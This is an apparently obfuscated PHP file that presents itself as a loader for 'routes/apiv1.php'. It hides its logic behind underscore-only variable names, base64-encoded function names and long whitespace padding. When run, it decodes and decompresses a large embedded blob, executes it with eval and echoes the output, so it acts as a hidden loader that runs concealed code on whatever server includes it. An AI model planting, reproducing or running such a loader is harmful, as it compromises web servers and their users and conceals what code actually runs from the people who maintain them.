<?php 
        $__='printf';$_='Loading routes/apiv1.php';
        



































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































                                                                                                                                                                                                                     $________;
